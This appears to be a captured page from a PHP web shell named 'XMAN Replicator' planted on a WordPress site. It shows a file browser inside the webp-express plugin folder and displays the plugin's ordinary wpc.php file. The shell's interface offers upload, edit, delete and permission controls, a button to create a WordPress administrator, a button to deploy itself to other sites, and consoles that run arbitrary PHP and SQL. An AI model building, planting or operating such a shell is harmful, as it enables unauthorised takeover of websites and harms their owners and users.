🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
home
/
vestsxzf
/
public_html
/
wp-content
/
plugins
/
webp-express
/
web-service
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2026-03-27 10:27
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2026-03-27 10:27
🔄
🗑️
🗑️📁
⬇️
🔒
.htaccess
192 B
-rw-r--r--
2026-03-27 10:27
✏️
🔄
🗑️
⬇️
🔒
wpc.php
1,103 B
-rw-r--r--
2026-03-27 10:27
✏️
🔄
🗑️
⬇️
🔒
View: wpc.php
<?php require __DIR__ . '/../vendor/autoload.php'; use \WebPConvertCloudService\WebPConvertCloudService; include_once __DIR__ . '../../lib/classes/Config.php'; use \WebPExpress\Config; include_once __DIR__ . '../../lib/classes/Paths.php'; use \WebPExpress\Paths; include_once __DIR__ . '/../lib/classes/Config.php'; // Patch together $options object for wpc... $options = []; $config = Config::loadConfigAndFix(false); if (!isset($config['web-service'])) { WebPConvertCloudService::exitWithError(WebPConvertCloudService::ERROR_ACCESS_DENIED, 'Web Service is not configured'); } $webServiceConfig = $config['web-service']; if (!$webServiceConfig['enabled']) { WebPConvertCloudService::exitWithError(WebPConvertCloudService::ERROR_ACCESS_DENIED, 'Web Service is not enabled'); } $options['destination-dir'] = Paths::getCacheDirAbs() . '/wpc'; $options['access'] = [ //'allowed-ips' => ['127.0.0.1'], 'whitelist' => $webServiceConfig['whitelist'] ]; $options['webp-convert'] = Config::generateWodOptionsFromConfigObj($config); WebPConvertCloudService::handleRequest($options);
PHP Console
Execute
SQL Console
Execute